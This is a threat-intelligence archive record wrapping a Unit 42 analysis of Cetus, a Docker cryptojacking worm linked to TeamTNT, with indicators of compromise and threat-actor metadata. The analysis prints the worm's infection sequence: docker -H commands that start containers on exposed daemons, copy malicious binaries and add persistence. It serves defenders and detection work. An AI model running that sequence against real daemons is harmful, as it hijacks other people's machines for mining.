{
	"id": "dc35e1e3-c244-465f-8f78-617c26a6299b",
	"created_at": "2026-04-06T01:29:34.975406Z",
	"updated_at": "2026-04-10T13:12:12.11201Z",
	"deleted_at": null,
	"sha1_hash": "2b8715b05b7b1562aa19294e2cbb298a054de09d",
	"title": "Cetus: Cryptojacking Worm Targeting Docker Daemons",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 561661,
	"plain_text": "Cetus: Cryptojacking Worm Targeting Docker Daemons\r\nBy Aviv Sasson\r\nPublished: 2020-08-27 · Archived: 2026-04-06 00:39:21 UTC\r\nExecutive Summary\r\nUnsecured Docker daemons have been known to security professionals as a major threat since the early days of containers.\r\nUnit 42 recently wrote about Graboid, the first-ever Docker cryptojacking worm and unsecured Docker daemons. I\r\nconducted additional research by setting up a Docker daemon honeypot in order to examine how things look for an average\r\nDocker daemon in the wild and learn if the shift to the cloud caused by COVID-19 increased the prevalence and\r\nsophistication of targeted cloud attacks.\r\nThis blog will detail the discovery of Cetus, a new and improved Docker cryptojacking worm mining for Monero that was\r\nfound in a Docker daemon honeypot we created. Cetus was created by TeamTnT, a group that's been attacking AWS and\r\nDocker daemons.\r\nPalo Alto Networks customers running Prisma Cloud are protected from this through the Prisma Cloud Compute host\r\ncompliance protection, which alerts on an insufficient Docker daemon configuration and suggests a solution.\r\nThe Honeypot\r\nTo conduct the research, I set isolated restricted Docker daemons and logged all the traffic coming through for the month of\r\nMay. During that period of time, I witnessed various kinds of attacks, delivering anything from botnets to worms, and most\r\nof them were for the purpose of cryptojacking, especially for Monero.\r\nOne of the most frequent attacks captured my attention because it had a potential pattern of a worm. Unlike other attacks,\r\nhere the honeypot was attacked from many different unsecured Docker daemon instances. According to my honeypot\r\ndeployments and other research projects on container security, it is not common to see worms targeting unsecured Docker\r\ndaemons. I decided to analyze the payload and determined that this was a new Docker worm: Each instance of the malware\r\nattempts to discover and infect other Docker daemon instances, in the local network and outside.\r\nHow Cetus Works\r\nIn Greek mythology, there are stories about a whale-like creature that looks innocuous but is actually a sea monster that\r\nwreaks havoc wherever it goes. The name of that creature is Cetus. Since the malware is aiming for Docker daemons and\r\ntrying to disguise itself as legitimate binaries, I decided to name it Cetus.\r\nCetus disguises itself by impersonating a legitimate binary that is frequently used in Docker environments called Portainer.\r\nPortainer is a user interface (UI) management tool that offers a convenient way to manage multiple Docker environments.\r\nWhile taking over a new machine, Cetus copies itself to the victim and deploys an XMRig cryptominer payload. Cetus\r\ndisguises the cryptominer as a different legitimate binary called docker-cache. It looks like a legitimate name but, unlike\r\nPortainer, it is not a name of a genuine binary.\r\nhttps://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/\r\nPage 1 of 7\n\nFigure 1. Cetus life cycle.\r\nThe infection mechanism is simple and effective. Cetus uses Masscan to randomly scan subnets for Docker daemons and,\r\nonce it finds one, it tries to spread by sending requests to daemon’s REST API. To add insult to injury, Cetus crafts these\r\nrequests by using the Docker command line interface (CLI) tool.\r\nThe attack flow of Cetus is described in Figure 1. Specifically, the commands that Cetus runs are:\r\nCheck the daemon is exploitable and was not infected:\r\n1 docker -H \u003cvictim\u003e ps -a\r\nRun a new container of ubuntu:18.04 from Docker Hub:\r\n1 docker -H \u003cvictim\u003e run -dt --name \u003cname\u003e --restart always ubuntu:18.04 /bin/bash\r\nUpdate the package manager lists:\r\n1 docker -H \u003cvictim\u003e exec \u003cname\u003e apt-get -yq update\r\nhttps://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/\r\nPage 2 of 7\n\nInstall Masscan and Docker through the package manager:\r\n1 docker -H \u003cvictim\u003e exec \u003cname\u003e apt-get install masscan docker.io\r\nCopy the malicious portainer and docker-cache binaries to the container:\r\n1\r\n2\r\ndocker -H \u003cvictim\u003e cp -L docker-cache \u003cname\u003e:/usr/bin/\r\ndocker -H \u003cvictim\u003e cp -L portainer \u003cname\u003e/usr/bin/\r\nAdd Cetus to “/root/.bash_aliases. It will cause Cetus to run every time the container restarts or root starts a bash\r\nsession:\r\n1 docker -H \u003cvictim\u003e exec \u003cname\u003e bash --norc -c `echo /usr/bin/portainer \u003cname\u003e \u003e/dev/null` 2\u003e/dev/null \u0026\r\nRestart the container in order to run Cetus:\r\n1 docker -H \u003cvictim\u003e restart \u003cname\u003e\r\nReverse Engineering Cetus\r\nReverse engineering Cetus was easy and fast since it doesn’t use any anti-debugging or obfuscation techniques and even has\r\nsymbols. On the other hand, this was not the case with the miner. XMRig miner is one of the most widely used cryptominers\r\nfor cryptojacking attacks, hence security tools treat it as a virus. Therefore, in order to deceive them in this attack, it was\r\nfully obfuscated, which made the reverse engineering process harder.\r\nIn addition, we can conclude the malware is new because it uses XMRig 5.5.3, which was released on Feb. 2, 2020.\r\nCetus’s architecture is simple. It contains two main functions:\r\nminer_start and scan_start.\r\nFigure 2. Cetus main function.\r\nThe function miner_start is straightforward. It opens /var/log/stmp.log in order to log Cetus’s actions, and after that, it runs\r\nthe XMRig cryptominer, which utilizes the machine’s CPU in order to mine Monero.\r\nhttps://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/\r\nPage 3 of 7\n\nThe function scan_start is much more interesting and executes the core malware functionality. It picks a random 16-bit\r\nsubnet and runs Masscan in order to scan the subnet for Docker daemons on port 2375. When it finds a daemon, it starts the\r\ninfection process using the Docker CLI tool that was already downloaded.\r\nAn interesting thing about the malware is that every time it infects a Docker daemon, it calls the container in a different\r\nname. It has two lists of eight names each, and it randomly picks a name from each list and links them.\r\nFigure 3. Malicious container names.\r\nThen Cetus will run the miner with the name as an argument. The miner will identify itself to the mining pool with this\r\nname and send the actor information about the mining. That will allow the attacker to classify each miner and create\r\nstatistics about the miners and the campaign through the mining pool API.\r\nWe can conclude from this and the logs mechanism that the operator of this worm wants to monitor everything carefully.\r\nConclusion\r\nMalware targeting containers will gradually become more complex as attackers understand the potential of the cloud. This is\r\nthe second Docker cryptojacking worm documented by Unit 42 after Graboid. In addition, we were able to link Cetus to\r\nTeamTNT, a group that's been attacking AWS and Docker daemons that used the same Monero wallet address as Cetus. We\r\nconclude that there is a growing trend of sophisticated attacks on the cloud.\r\nPalo Alto Networks customers running Prisma Cloud are protected from this through the Prisma Cloud Compute host\r\ncompliance protection, which alerts on an insufficient Docker daemon configuration and suggests a solution.\r\nFigure 4. Prisma Cloud host alert\r\nIndicator of Compromise\r\nFiles\r\nhttps://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/\r\nPage 4 of 7\n\nFilename SHA256\r\ndocker-cache e03cf2af46ad1fe590e63f0020243c6e8ae94f074e65ace18c6d568283343dac\r\nportainer b49a3f3cb4c70014e2c35c880d47bc475584b87b7dfcfa6d7341d42a16ebe443\r\nTable 1.Malware hashes\r\nMining Information\r\nPool\r\npool.minexmr.com:443\r\nPayment Address\r\n85X7JcgPpwQdZXaK2TKJb8baQAXc3zBsnW7JuY7MLi9VYSamf4bFwa7SEAK9Hgp2P53npV19w1zuaK5bft5m2NN71CmNL\r\nContainer Names\r\nbaleful_gormmet\r\nbaleful_obelus\r\nbaleful_agelast\r\nbaleful_amatorculist\r\nbaleful_peristeronic\r\nbaleful_hirquiticke\r\nbaleful_oxter\r\nbaleful_quire\r\nboorish_gormmet\r\nboorish_obelus\r\nboorish_agelast\r\nboorish_amatorculist\r\nboorish_peristeronic\r\nboorish_hirquiticke\r\nboorish_oxter\r\nboorish_quire\r\nadroit_gormmet\r\nadroit_obelus\r\nhttps://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/\r\nPage 5 of 7\n\nadroit_agelast\r\nadroit_amatorculist\r\nadroit_peristeronic\r\nadroit_hirquiticke\r\nadroit_oxter\r\nadroit_quire\r\nfecund_gormmet\r\nfecund_obelus\r\nfecund_agelast\r\nfecund_amatorculist\r\nfecund_peristeronic\r\nfecund_hirquiticke\r\nfecund_oxter\r\nfecund_quire\r\nlimpid_gormmet\r\nlimpid_obelus\r\nlimpid_agelast\r\nlimpid_amatorculist\r\nlimpid_peristeronic\r\nlimpid_hirquiticke\r\nlimpid_oxter\r\nlimpid_quire\r\nrisible_gormmet\r\nrisible_obelus\r\nrisible_agelast\r\nrisible_amatorculist\r\nrisible_peristeronic\r\nrisible_hirquiticke\r\nrisible_oxter\r\nhttps://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/\r\nPage 6 of 7\n\nrisible_quire\r\nverdant_gormmet\r\nverdant_obelus\r\nverdant_agelast\r\nverdant_amatorculist\r\nverdant_peristeronic\r\nverdant_hirquiticke\r\nverdant_oxter\r\nverdant_quire\r\nzealous_gormmet\r\nzealous_obelus\r\nzealous_agelast\r\nzealous_amatorculist\r\nzealous_peristeronic\r\nzealous_hirquiticke\r\nzealous_oxter\r\nzealous_quire\r\nSource: https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/\r\nhttps://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/"
	],
	"report_names": [
		"cetus-cryptojacking-worm"
	],
	"threat_actors": [
		{
			"id": "f809bfcb-b200-4988-80a8-be78ef6a52ef",
			"created_at": "2023-01-06T13:46:39.186988Z",
			"updated_at": "2026-04-10T02:00:03.240002Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"Adept Libra"
			],
			"source_name": "MISPGALAXY:TeamTNT",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c3ca592f-0669-49bd-ab5c-310007ab2fb4",
			"created_at": "2022-10-25T15:50:23.334495Z",
			"updated_at": "2026-04-10T02:00:05.264841Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"TeamTNT"
			],
			"source_name": "MITRE:TeamTNT",
			"tools": [
				"Peirates",
				"MimiPenguin",
				"LaZagne",
				"Hildegard"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775438974,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2b8715b05b7b1562aa19294e2cbb298a054de09d.pdf",
		"text": "https://archive.orkl.eu/2b8715b05b7b1562aa19294e2cbb298a054de09d.txt",
		"img": "https://archive.orkl.eu/2b8715b05b7b1562aa19294e2cbb298a054de09d.jpg"
	}
}